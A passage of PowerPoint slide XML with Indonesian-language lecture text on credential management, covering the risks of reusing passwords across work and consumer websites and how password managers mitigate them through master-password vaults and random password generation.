              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>petunjuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tempat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> lain (di situs web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ritel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Perilaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>diatur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1"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64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17560389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Pengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Kata Sandi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>buruk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikendalikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan situs web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsumen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembobolan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs-situs web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimitigasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Sebagian </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peramban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contohnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Windows Credential Manager dan iCloud Keychain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>milik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Apple. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memasang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peramban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>brankas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Brankas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemungkinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menawarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ketika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperbarui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>acak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Parameternya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disesuaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panjang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerumitan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pun yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh situs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
